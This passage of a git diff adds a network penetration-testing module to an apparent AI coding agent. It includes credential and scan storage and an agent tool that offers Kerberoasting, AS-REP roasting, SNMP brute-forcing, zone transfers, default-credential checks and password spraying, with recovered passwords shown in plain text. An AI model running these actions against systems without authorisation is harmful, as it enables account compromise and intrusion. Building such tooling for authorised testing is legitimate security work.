+  const credBuffer: NetScanTypes.CredentialResult[] = []
+
+  // ========== Scan Results ==========
+
+  /**
+   * Save a scan result.
+   */
+  export async function saveScan(
+    result: Omit<NetScanTypes.NetScanResult, "id"> | NetScanTypes.NetScanResult,
+    config: StorageConfig = {}
+  ): Promise<NetScanTypes.NetScanResult> {
+    const full: NetScanTypes.NetScanResult = {
+      ...result,
+      id: "id" in result && result.id ? result.id : generateScanId(),
+    }
+    const validated = NetScanTypes.NetScanResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = scanBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        scanBuffer[existingIdx] = validated
+      } else {
+        scanBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "netscan", "scans", validated.id], validated)
+    }
+
+    log.info("Network scan saved", {
+      id: validated.id,
+      target: validated.target,
+      profile: validated.profile,
+      hostsCount: validated.hosts.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get a scan result by ID.
+   */
+  export async function getScan(id: string, config: StorageConfig = {}): Promise<NetScanTypes.NetScanResult | null> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<NetScanTypes.NetScanResult>(["pentest", "netscan", "scans", id])
+      return NetScanTypes.NetScanResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List scan results with filters.
+   */
+  export async function listScans(
+    config: StorageConfig = {},
+    filters?: {
+      target?: string
+      profile?: NetScanTypes.ProfileId
+      status?: NetScanTypes.Status
+      limit?: number
+    }
+  ): Promise<NetScanTypes.NetScanResult[]> {
+    let scans: NetScanTypes.NetScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "netscan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<NetScanTypes.NetScanResult>(key)
+          scans.push(NetScanTypes.NetScanResult.parse(data))
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.target) {
+      scans = scans.filter((s) => s.target === filters.target)
+    }
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    scans.sort((a, b) => b.startedAt - a.startedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Delete a scan result.
+   */
+  export async function deleteScan(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = scanBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        scanBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "netscan", "scans", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  // ========== Hosts ==========
+
+  /**
+   * Save a network host.
+   */
+  export async function saveHost(
+    host: NetScanTypes.NetworkHost,
+    config: StorageConfig = {}
+  ): Promise<NetScanTypes.NetworkHost> {
+    const id = generateHostId(host.ip)
+    const validated = NetScanTypes.NetworkHost.parse(host)
+
+    if (config.storage === "memory") {
+      const existingIdx = hostBuffer.findIndex((h) => h.ip === validated.ip)
+      if (existingIdx >= 0) {
+        hostBuffer[existingIdx] = validated
+      } else {
+        hostBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "netscan", "hosts", id], validated)
+    }
+
+    log.info("Host saved", {
+      ip: validated.ip,
+      hostname: validated.hostname,
+      servicesCount: validated.services.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get a host by IP.
+   */
+  export async function getHost(ip: string, config: StorageConfig = {}): Promise<NetScanTypes.NetworkHost | null> {
+    if (config.storage === "memory") {
+      return hostBuffer.find((h) => h.ip === ip) || null
+    }
+
+    const id = generateHostId(ip)
+    try {
+      const data = await Storage.read<NetScanTypes.NetworkHost>(["pentest", "netscan", "hosts", id])
+      return NetScanTypes.NetworkHost.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List hosts with filters.
+   */
+  export async function listHosts(
+    config: StorageConfig = {},
+    filters?: {
+      domain?: string
+      service?: string
+      limit?: number
+    }
+  ): Promise<NetScanTypes.NetworkHost[]> {
+    let hosts: NetScanTypes.NetworkHost[]
+
+    if (config.storage === "memory") {
+      hosts = [...hostBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "netscan", "hosts"])
+      hosts = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<NetScanTypes.NetworkHost>(key)
+          hosts.push(NetScanTypes.NetworkHost.parse(data))
+        } catch {
+          log.warn("Failed to parse host file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.domain) {
+      hosts = hosts.filter((h) => h.domain === filters.domain)
+    }
+    if (filters?.service) {
+      hosts = hosts.filter((h) => h.services.some((s) => s.service === filters.service))
+    }
+
+    // Sort by discovery time (newest first)
+    hosts.sort((a, b) => b.discoveredAt - a.discoveredAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      hosts = hosts.slice(0, filters.limit)
+    }
+
+    return hosts
+  }
+
+  // ========== AD Domains ==========
+
+  /**
+   * Save an AD domain.
+   */
+  export async function saveDomain(
+    domain: NetScanTypes.ADDomain,
+    config: StorageConfig = {}
+  ): Promise<NetScanTypes.ADDomain> {
+    const id = generateDomainId(domain.name)
+    const validated = NetScanTypes.ADDomain.parse(domain)
+
+    if (config.storage === "memory") {
+      const existingIdx = domainBuffer.findIndex((d) => d.name === validated.name)
+      if (existingIdx >= 0) {
+        domainBuffer[existingIdx] = validated
+      } else {
+        domainBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "netscan", "domains", id], validated)
+    }
+
+    log.info("AD domain saved", {
+      name: validated.name,
+      netbios: validated.netbios,
+      dcCount: validated.domainControllers.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get an AD domain by name.
+   */
+  export async function getDomain(name: string, config: StorageConfig = {}): Promise<NetScanTypes.ADDomain | null> {
+    if (config.storage === "memory") {
+      return domainBuffer.find((d) => d.name.toLowerCase() === name.toLowerCase()) || null
+    }
+
+    const id = generateDomainId(name)
+    try {
+      const data = await Storage.read<NetScanTypes.ADDomain>(["pentest", "netscan", "domains", id])
+      return NetScanTypes.ADDomain.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List AD domains.
+   */
+  export async function listDomains(config: StorageConfig = {}): Promise<NetScanTypes.ADDomain[]> {
+    if (config.storage === "memory") {
+      return [...domainBuffer]
+    }
+
+    const keys = await Storage.list(["pentest", "netscan", "domains"])
+    const domains: NetScanTypes.ADDomain[] = []
+    for (const key of keys) {
+      try {
+        const data = await Storage.read<NetScanTypes.ADDomain>(key)
+        domains.push(NetScanTypes.ADDomain.parse(data))
+      } catch {
+        log.warn("Failed to parse domain file", { key })
+      }
+    }
+    return domains
+  }
+
+  // ========== Credentials ==========
+
+  /**
+   * Save a credential result (password will be encrypted).
+   */
+  export async function saveCredential(
+    cred: Omit<NetScanTypes.CredentialResult, "id"> | NetScanTypes.CredentialResult,
+    config: StorageConfig = {}
+  ): Promise<NetScanTypes.CredentialResult> {
+    const full: NetScanTypes.CredentialResult = {
+      ...cred,
+      id: "id" in cred && cred.id ? cred.id : generateCredId(),
+    }
+
+    // Encrypt password if encryption key is provided
+    if (config.encryptionKey && full.password) {
+      full.password = encryptPassword(full.password, config.encryptionKey)
+    }
+
+    const validated = NetScanTypes.CredentialResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = credBuffer.findIndex((c) => c.id === validated.id)
+      if (existingIdx >= 0) {
+        credBuffer[existingIdx] = validated
+      } else {
+        credBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "netscan", "credentials", validated.id ?? generateCredId()], validated)
+    }
+
+    log.info("Credential saved", {
+      id: validated.id,
+      host: validated.host,
+      service: validated.service,
+      username: validated.username,
+      valid: validated.valid,
+    })
+    return validated
+  }
+
+  /**
+   * Get a credential by ID.
+   */
+  export async function getCredential(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<NetScanTypes.CredentialResult | null> {
+    let cred: NetScanTypes.CredentialResult | null = null
+
+    if (config.storage === "memory") {
+      cred = credBuffer.find((c) => c.id === id) || null
+    } else {
+      try {
+        const data = await Storage.read<NetScanTypes.CredentialResult>(["pentest", "netscan", "credentials", id])
+        cred = NetScanTypes.CredentialResult.parse(data)
+      } catch (err) {
+        if (err instanceof Storage.NotFoundError) {
+          return null
+        }
+        throw err
+      }
+    }
+
+    // Decrypt password if encryption key is provided
+    if (cred && config.encryptionKey && cred.password) {
+      try {
+        cred = { ...cred, password: decryptPassword(cred.password, config.encryptionKey) }
+      } catch {
+        // If decryption fails, return as-is (may already be decrypted)
+      }
+    }
+
+    return cred
+  }
+
+  /**
+   * List credentials with filters.
+   */
+  export async function listCredentials(
+    config: StorageConfig = {},
+    filters?: {
+      host?: string
+      service?: string
+      username?: string
+      valid?: boolean
+      admin?: boolean
+      limit?: number
+    }
+  ): Promise<NetScanTypes.CredentialResult[]> {
+    let creds: NetScanTypes.CredentialResult[]
+
+    if (config.storage === "memory") {
+      creds = [...credBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "netscan", "credentials"])
+      creds = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<NetScanTypes.CredentialResult>(key)
+          creds.push(NetScanTypes.CredentialResult.parse(data))
+        } catch {
+          log.warn("Failed to parse credential file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.host) {
+      creds = creds.filter((c) => c.host === filters.host)
+    }
+    if (filters?.service) {
+      creds = creds.filter((c) => c.service === filters.service)
+    }
+    if (filters?.username) {
+      creds = creds.filter((c) => c.username === filters.username)
+    }
+    if (filters?.valid !== undefined) {
+      creds = creds.filter((c) => c.valid === filters.valid)
+    }
+    if (filters?.admin !== undefined) {
+      creds = creds.filter((c) => c.admin === filters.admin)
+    }
+
+    // Sort by timestamp (newest first)
+    creds.sort((a, b) => b.timestamp - a.timestamp)
+
+    // Apply limit
+    if (filters?.limit) {
+      creds = creds.slice(0, filters.limit)
+    }
+
+    // Decrypt passwords if encryption key is provided
+    if (config.encryptionKey) {
+      creds = creds.map((c) => {
+        if (c.password) {
+          try {
+            return { ...c, password: decryptPassword(c.password, config.encryptionKey!) }
+          } catch {
+            return c
+          }
+        }
+        return c
+      })
+    }
+
+    return creds
+  }
+
+  /**
+   * Delete a credential.
+   */
+  export async function deleteCredential(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = credBuffer.findIndex((c) => c.id === id)
+      if (idx >= 0) {
+        credBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "netscan", "credentials", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  // ========== Memory Management ==========
+
+  /**
+   * Clear memory buffers (testing).
+   */
+  export function clearMemory(): void {
+    scanBuffer.length = 0
+    hostBuffer.length = 0
+    domainBuffer.length = 0
+    credBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts (testing).
+   */
+  export function memoryCount(): {
+    scans: number
+    hosts: number
+    domains: number
+    credentials: number
+  } {
+    return {
+      scans: scanBuffer.length,
+      hosts: hostBuffer.length,
+      domains: domainBuffer.length,
+      credentials: credBuffer.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/tool.ts b/packages/opencode/src/pentest/netscan/tool.ts
new file mode 100644
index 00000000000..77ba1a9152e
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/tool.ts
@@ -0,0 +1,513 @@
+/**
+ * @fileoverview Network Scanner Tool
+ *
+ * Agent-facing tool for network infrastructure scanning.
+ *
+ * @module pentest/netscan/tool
+ */
+
+import z from "zod"
+import { Tool } from "../../tool/tool"
+import { NetScanTypes } from "./types"
+import { NetScanProfiles } from "./profiles"
+import { NetScanOrchestrator } from "./orchestrator"
+import { SMBShares, SMBSessions, SMBSigning, SMBVulns } from "./smb"
+import { DNSZone, DNSEnum } from "./dns"
+import { SNMPCommunity, SNMPWalk } from "./snmp"
+import { LDAPBind, LDAPEnum, LDAPPolicy } from "./ldap"
+import { ADEnumeration, Kerberos, DomainTrusts } from "./ad"
+import { DefaultCreds, PasswordSpray } from "./creds"
+
+/**
+ * Tool parameter schema.
+ */
+const ParameterSchema = z.object({
+  action: z.enum([
+    "discover",
+    "scan",
+    "ad-enum",
+    "ad-users",
+    "ad-groups",
+    "ad-computers",
+    "ad-kerberoast",
+    "ad-asrep",
+    "smb-shares",
+    "smb-null",
+    "smb-signing",
+    "smb-vulns",
+    "snmp-walk",
+    "snmp-brute",
+    "dns-zone",
+    "dns-enum",
+    "ldap-enum",
+    "ldap-policy",
+    "creds-default",
+    "creds-spray",
+    "status",
+    "profiles",
+  ]),
+  target: z.string().optional(),
+  profile: z.enum(["discovery", "quick", "standard", "thorough", "stealth", "ad-focused", "custom"]).optional(),
+  dc: z.string().optional(),
+  domain: z.string().optional(),
+  username: z.string().optional(),
+  password: z.string().optional(),
+  community: z.string().optional(),
+  service: z.string().optional(),
+  port: z.number().optional(),
+  users: z.array(z.string()).optional(),
+  passwords: z.array(z.string()).optional(),
+  scanId: z.string().optional(),
+})
+
+type Parameters = z.infer<typeof ParameterSchema>
+
+/**
+ * Network Scanner Tool.
+ */
+export const NetScanTool = Tool.define("netscan", async () => {
+  return {
+    description: `Network infrastructure security scanner for enterprise environments.
+
+Actions:
+- discover: Discover network hosts and services
+- scan: Run full scan with specified profile
+- ad-enum: Enumerate Active Directory domain
+- ad-users: List domain users
+- ad-groups: List domain groups
+- ad-computers: List domain computers
+- ad-kerberoast: Find Kerberoastable accounts
+- ad-asrep: Find AS-REP roastable accounts
+- smb-shares: Enumerate SMB shares
+- smb-null: Test null session access
+- smb-signing: Check SMB signing configuration
+- smb-vulns: Check for SMB vulnerabilities
+- snmp-walk: SNMP walk with community string
+- snmp-brute: Brute-force SNMP community strings
+- dns-zone: Attempt DNS zone transfer
+- dns-enum: Enumerate subdomains
+- ldap-enum: LDAP enumeration
+- ldap-policy: Extract password policy
+- creds-default: Test default credentials
+- creds-spray: Password spraying attack
+- status: Get scan status
+- profiles: List available scan profiles
+
+Profiles: discovery, quick, standard, thorough, stealth, ad-focused`,
+
+    parameters: ParameterSchema,
+
+    async execute(params: Parameters): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+      const makeResult = (title: string, output: string, metadata: Record<string, unknown> = {}) => ({
+        title,
+        output,
+        metadata,
+      })
+
+      switch (params.action) {
+        case "profiles":
+          return makeResult("List scan profiles", NetScanProfiles.formatTable())
+
+        case "status":
+          if (!params.scanId) {
+            return makeResult("Get scan status", "Error: scanId is required for status action")
+          }
+          const scan = await NetScanOrchestrator.getStatus(params.scanId)
+          if (!scan) {
+            return makeResult("Get scan status", `Scan ${params.scanId} not found`)
+          }
+          return makeResult("Get scan status", formatScanResult(scan), { scanId: params.scanId, status: scan.status })
+
+        case "scan":
+          if (!params.target) {
+            return makeResult("Network scan", "Error: target is required for scan action")
+          }
+          const result = await NetScanOrchestrator.scan(params.target, {
+            profile: params.profile as NetScanTypes.ProfileId,
+            auth: params.username && params.password
+              ? { username: params.username, password: params.password, domain: params.domain }
+              : undefined,
+          })
+          return makeResult("Network scan", formatScanResult(result), { scanId: result.id, target: params.target, profile: params.profile })
+
+        case "ad-enum":
+          if (!params.dc || !params.domain || !params.username || !params.password) {
+            return makeResult("AD enumeration", "Error: dc, domain, username, and password are required for AD enumeration")
+          }
+          const adResult = await ADEnumeration.enumerate({
+            dc: params.dc,
+            domain: params.domain,
+            auth: { username: params.username, password: params.password },
+          })
+          return makeResult("AD enumeration", ADEnumeration.formatResults(adResult), { domain: params.domain })
+
+        case "ad-users":
+          if (!params.dc || !params.domain || !params.username || !params.password) {
+            return makeResult("AD users", "Error: dc, domain, username, and password are required")
+          }
+          const users = await ADEnumeration.getUsers(params.dc, {
+            username: params.username,
+            password: params.password,
+            domain: params.domain,
+          })
+          return makeResult("AD users", formatUsers(users), { domain: params.domain, count: users.length })
+
+        case "ad-groups":
+          if (!params.dc || !params.domain || !params.username || !params.password) {
+            return makeResult("AD groups", "Error: dc, domain, username, and password are required")
+          }
+          const groups = await ADEnumeration.getGroups(params.dc, {
+            username: params.username,
+            password: params.password,
+            domain: params.domain,
+          })
+          return makeResult("AD groups", formatGroups(groups), { domain: params.domain, count: groups.length })
+
+        case "ad-computers":
+          if (!params.dc || !params.domain || !params.username || !params.password) {
+            return makeResult("AD computers", "Error: dc, domain, username, and password are required")
+          }
+          const computers = await ADEnumeration.getComputers(params.dc, {
+            username: params.username,
+            password: params.password,
+            domain: params.domain,
+          })
+          return makeResult("AD computers", formatComputers(computers), { domain: params.domain, count: computers.length })
+
+        case "ad-kerberoast":
+          if (!params.dc || !params.domain || !params.username || !params.password) {
+            return makeResult("Kerberoast", "Error: dc, domain, username, and password are required")
+          }
+          const kerbResult = await Kerberos.findTargets({
+            dc: params.dc,
+            domain: params.domain,
+            auth: { username: params.username, password: params.password },
+          })
+          return makeResult("Kerberoast", Kerberos.formatResults(kerbResult), { domain: params.domain, targets: kerbResult.kerberoastTargets.length })
+
+        case "ad-asrep":
+          if (!params.dc || !params.domain || !params.username || !params.password) {
+            return makeResult("AS-REP roast", "Error: dc, domain, username, and password are required")
+          }
+          const asrepResult = await Kerberos.findTargets({
+            dc: params.dc,
+            domain: params.domain,
+            auth: { username: params.username, password: params.password },
+          })
+          return makeResult("AS-REP roast", formatASRepTargets(asrepResult.asrepTargets), { domain: params.domain, targets: asrepResult.asrepTargets.length })
+
+        case "smb-shares":
+          if (!params.target) {
+            return makeResult("SMB shares", "Error: target is required")
+          }
+          const shares = await SMBShares.enumerate(params.target, {
+            auth: params.username && params.password
+              ? { username: params.username, password: params.password, domain: params.domain }
+              : undefined,
+            checkAccess: true,
+          })
+          return makeResult("SMB shares", formatShares(shares), { target: params.target, count: shares.length })
+
+        case "smb-null":
+          if (!params.target) {
+            return makeResult("SMB null session", "Error: target is required")
+          }
+          const nullResult = await SMBSessions.testNullSession(params.target)
+          return makeResult("SMB null session", formatNullSession(nullResult), { target: params.target, allowed: nullResult.allowed })
+
+        case "smb-signing":
+          if (!params.target) {
+            return makeResult("SMB signing", "Error: target is required")
+          }
+          const signingResult = await SMBSigning.check(params.target)
+          return makeResult("SMB signing", SMBSigning.formatResults([signingResult]), { target: params.target })
+
+        case "smb-vulns":
+          if (!params.target) {
+            return makeResult("SMB vulnerabilities", "Error: target is required")
+          }
+          const vulnResult = await SMBVulns.check(params.target)
+          return makeResult("SMB vulnerabilities", SMBVulns.formatResults([vulnResult]), { target: params.target, count: vulnResult.vulnerabilities.length })
+
+        case "snmp-walk":
+          if (!params.target || !params.community) {
+            return makeResult("SNMP walk", "Error: target and community are required")
+          }
+          const walkResult = await SNMPWalk.walk(params.target, {
+            community: params.community,
+          })
+          return makeResult("SNMP walk", SNMPWalk.formatResults(walkResult), { target: params.target, community: params.community })
+
+        case "snmp-brute":
+          if (!params.target) {
+            return makeResult("SNMP brute-force", "Error: target is required")
+          }
+          const bruteResult = await SNMPCommunity.bruteForce(params.target)
+          return makeResult("SNMP brute-force", SNMPCommunity.formatResults(bruteResult), { target: params.target, found: bruteResult.found.length })
+
+        case "dns-zone":
+          if (!params.target) {
+            return makeResult("DNS zone transfer", "Error: target (domain) is required")
+          }
+          const zoneResult = await DNSZone.attemptTransfer(params.target)
+          return makeResult("DNS zone transfer", DNSZone.formatResults(zoneResult), { target: params.target, success: zoneResult.success })
+
+        case "dns-enum":
+          if (!params.target) {
+            return makeResult("DNS enumeration", "Error: target (domain) is required")
+          }
+          const enumResult = await DNSEnum.enumerate(params.target, {
+            bruteForce: true,
+          })
+          return makeResult("DNS enumeration", DNSEnum.formatResults(enumResult), { target: params.target, subdomains: enumResult.subdomains.length })
+
+        case "ldap-enum":
+          if (!params.target) {
+            return makeResult("LDAP enumeration", "Error: target is required")
+          }
+          const baseDN = params.domain
+            ? params.domain.split(".").map((p) => `DC=${p}`).join(",")
+            : ""
+          if (!baseDN) {
+            return makeResult("LDAP enumeration", "Error: domain is required for LDAP enumeration")
+          }
+          const ldapResult = await LDAPEnum.enumerate(params.target, {
+            baseDN,
+            auth: params.username && params.password
+              ? { username: params.username, password: params.password, domain: params.domain }
+              : undefined,
+          })
+          return makeResult("LDAP enumeration", LDAPEnum.formatResults(ldapResult), { target: params.target, domain: params.domain })
+
+        case "ldap-policy":
+          if (!params.target || !params.domain) {
+            return makeResult("LDAP password policy", "Error: target and domain are required")
+          }
+          const policyBaseDN = params.domain.split(".").map((p) => `DC=${p}`).join(",")
+          const policyResult = await LDAPPolicy.extract(params.target, {
+            baseDN: policyBaseDN,
+            auth: params.username && params.password
+              ? { username: params.username, password: params.password, domain: params.domain }
+              : undefined,
+          })
+          return makeResult("LDAP password policy", LDAPPolicy.formatResults(policyResult), { target: params.target, domain: params.domain })
+
+        case "creds-default":
+          if (!params.target || !params.service) {
+            return makeResult("Default credentials", "Error: target and service are required")
+          }
+          const port = params.port || getDefaultPort(params.service)
+          const credResults = await DefaultCreds.test(params.target, params.service, port)
+          return makeResult("Default credentials", formatCredentials(credResults), { target: params.target, service: params.service, found: credResults.length })
+
+        case "creds-spray":
+          if (!params.target || !params.users || params.users.length === 0) {
+            return makeResult("Password spray", "Error: target and users array are required")
+          }
+          const sprayResult = await PasswordSpray.spray(
+            {
+              host: params.target,
+              port: params.port || 445,
+              service: params.service || "smb",
+              domain: params.domain,
+            },
+            params.users,
+            params.passwords
+          )
+          return makeResult("Password spray", PasswordSpray.formatResults(sprayResult), { target: params.target, tested: sprayResult.tested })
+
+        default:
+          return makeResult("Unknown action", `Unknown action: ${params.action}`)
+      }
+    },
+  }
+})
+
+/**
+ * Get default port for a service.
+ */
+function getDefaultPort(service: string): number {
+  const ports: Record<string, number> = {
+    ssh: 22,
+    ftp: 21,
+    telnet: 23,
+    smb: 445,
+    ldap: 389,
+    mysql: 3306,
+    mssql: 1433,
+    postgres: 5432,
+    rdp: 3389,
+    vnc: 5900,
+  }
+  return ports[service.toLowerCase()] || 445
+}
+
+/**
+ * Format scan result for display.
+ */
+function formatScanResult(result: NetScanTypes.NetScanResult): string {
+  const lines: string[] = []
+
+  lines.push(`Network Scan: ${result.id}`)
+  lines.push(`Target: ${result.target}`)
+  lines.push(`Profile: ${result.profile}`)
+  lines.push(`Status: ${result.status}`)
+  lines.push("")
+  lines.push("Statistics:")
+  lines.push(`  Hosts Scanned: ${result.stats.hostsScanned}`)
+  lines.push(`  Services Found: ${result.stats.servicesFound}`)
+  lines.push(`  Vulnerabilities: ${result.stats.vulnerabilitiesFound}`)
+  lines.push(`  Credentials: ${result.stats.credentialsFound}`)
+  lines.push("")
+
+  if (result.findings.length > 0) {
+    lines.push("Findings:")
+    for (const finding of result.findings) {
+      lines.push(`  [!] ${finding}`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format users for display.
+ */
+function formatUsers(users: NetScanTypes.ADUser[]): string {
+  const lines: string[] = []
+  lines.push(`Found ${users.length} users`)
+  lines.push("")
+  lines.push("| Username | Enabled | Admin | SPNs | AS-REP |")
+  lines.push("|----------|---------|-------|------|--------|")
+
+  for (const user of users.slice(0, 50)) {
+    lines.push(
+      `| ${user.samAccountName} | ${user.enabled ? "Yes" : "No"} | ${user.adminCount ? "Yes" : "No"} | ${user.servicePrincipalNames.length} | ${user.dontRequirePreauth ? "Yes" : "No"} |`
+    )
+  }
+
+  if (users.length > 50) {
+    lines.push(`... and ${users.length - 50} more`)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format groups for display.
+ */
+function formatGroups(groups: NetScanTypes.ADGroup[]): string {
+  const lines: string[] = []
+  lines.push(`Found ${groups.length} groups`)
+  lines.push("")
+  lines.push("| Group | Privileged | Members |")
+  lines.push("|-------|------------|---------|")
+
+  for (const group of groups.slice(0, 50)) {
+    lines.push(`| ${group.samAccountName} | ${group.isPrivileged ? "Yes" : "No"} | ${group.members.length} |`)
+  }
+
+  if (groups.length > 50) {
+    lines.push(`... and ${groups.length - 50} more`)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format computers for display.
+ */
+function formatComputers(computers: NetScanTypes.ADComputer[]): string {
+  const lines: string[] = []
+  lines.push(`Found ${computers.length} computers`)
+  lines.push("")
+  lines.push("| Name | OS | DC |")
+  lines.push("|------|----|----|")
+
+  for (const comp of computers.slice(0, 50)) {
+    lines.push(`| ${comp.samAccountName} | ${comp.operatingSystem || "-"} | ${comp.isDomainController ? "Yes" : "No"} |`)
+  }
+
+  if (computers.length > 50) {
+    lines.push(`... and ${computers.length - 50} more`)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format AS-REP targets for display.
+ */
+function formatASRepTargets(targets: { samAccountName: string; isAdmin: boolean }[]): string {
+  const lines: string[] = []
+  lines.push(`Found ${targets.length} AS-REP roastable accounts`)
+
+  if (targets.length > 0) {
+    lines.push("")
+    lines.push("| Username | Admin |")
+    lines.push("|----------|-------|")
+
+    for (const target of targets) {
+      lines.push(`| ${target.samAccountName} | ${target.isAdmin ? "Yes" : "No"} |`)
+    }
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format shares for display.
+ */
+function formatShares(shares: NetScanTypes.SMBShare[]): string {
+  const lines: string[] = []
+  lines.push(`Found ${shares.length} shares`)
+  lines.push("")
+  lines.push("| Share | Type | Read | Write | Anonymous |")
+  lines.push("|-------|------|------|-------|-----------|")
+
+  for (const share of shares) {
+    lines.push(
+      `| ${share.name} | ${share.type} | ${share.permissions.read ? "Yes" : "No"} | ${share.permissions.write ? "Yes" : "No"} | ${share.permissions.anonymous ? "Yes" : "No"} |`
+    )
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format null session result for display.
+ */
+function formatNullSession(result: { allowed: boolean; sharesAccessible: number; usersEnumerable: boolean; findings: string[] }): string {
+  const lines: string[] = []
+  lines.push(`Null Session: ${result.allowed ? "ALLOWED" : "Denied"}`)
+  lines.push(`Shares Accessible: ${result.sharesAccessible}`)
+  lines.push(`Users Enumerable: ${result.usersEnumerable ? "Yes" : "No"}`)
+  lines.push("")
+
+  for (const finding of result.findings) {
+    lines.push(`[!] ${finding}`)
+  }
+
+  return lines.join("\n")
+}
+
+/**
+ * Format credentials for display.
+ */
+function formatCredentials(creds: NetScanTypes.CredentialResult[]): string {
+  if (creds.length === 0) {
+    return "No valid credentials found"
+  }
+
+  const lines: string[] = []
+  lines.push(`Found ${creds.length} valid credentials`)
+  lines.push("")
+  lines.push("| Service | Username | Password | Admin |")
+  lines.push("|---------|----------|----------|-------|")
+
+  for (const cred of creds) {
+    lines.push(`| ${cred.service} | ${cred.username} | ${cred.password || "***"} | ${cred.admin ? "Yes" : "No"} |`)
+  }
+
+  return lines.join("\n")
+}
diff --git a/packages/opencode/src/pentest/netscan/types.ts b/packages/opencode/src/pentest/netscan/types.ts
new file mode 100644
index 00000000000..33923e486d1
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/types.ts
@@ -0,0 +1,938 @@
+/**
+ * @fileoverview Network Infrastructure Scanner Types
+ *
+ * Zod schemas and TypeScript types for network infrastructure
+ * security testing including AD, SMB, SNMP, DNS, and LDAP.
+ *
+ * @module pentest/netscan/types
+ */
+
+import z from "zod"
+
+/**
+ * Network scan types namespace.
+ */
+export namespace NetScanTypes {
+  // ============================================
+  // Enums and Literals
+  // ============================================
+
+  /**
+   * Supported network protocols.
+   */
+  export const Protocol = z.enum(["tcp", "udp"])
+  export type Protocol = z.infer<typeof Protocol>
+
+  /**
+   * Network service types.
+   */
+  export const ServiceType = z.enum([
+    "smb",
+    "ldap",
+    "ldaps",
+    "dns",
+    "snmp",
+    "kerberos",
+    "rpc",
+    "ssh",
+    "ftp",
+    "telnet",
+    "rdp",
+    "winrm",
+    "mssql",
+    "mysql",
+    "postgresql",
+    "oracle",
+    "vnc",
+    "http",
+    "https",
+    "unknown",
+  ])
+  export type ServiceType = z.infer<typeof ServiceType>
+
+  /**
+   * Scan status values.
+   */
+  export const Status = z.enum(["pending", "running", "completed", "failed", "stopped"])
+  export type Status = z.infer<typeof Status>
+
+  /**
+   * Scan profile IDs.
+   */
+  export const ProfileId = z.enum([
+    "discovery",
+    "quick",
+    "standard",
+    "thorough",
+    "stealth",
+    "ad-focused",
+    "custom",
+  ])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /**
+   * SMB share types.
+   */
+  export const ShareType = z.enum(["disk", "printer", "ipc", "admin", "unknown"])
+  export type ShareType = z.infer<typeof ShareType>
+
+  /**
+   * SNMP versions.
+   */
+  export const SNMPVersion = z.enum(["v1", "v2c", "v3"])
+  export type SNMPVersion = z.infer<typeof SNMPVersion>
+
+  /**
+   * DNS record types.
+   */
+  export const DNSRecordType = z.enum([
+    "A",
+    "AAAA",
+    "CNAME",
+    "MX",
+    "NS",
+    "PTR",
+    "SOA",
+    "SRV",
+    "TXT",
+    "CAA",
+    "DNSKEY",
+    "DS",
+    "NSEC",
+    "RRSIG",
+  ])
+  export type DNSRecordType = z.infer<typeof DNSRecordType>
+
+  /**
+   * AD functional levels.
+   */
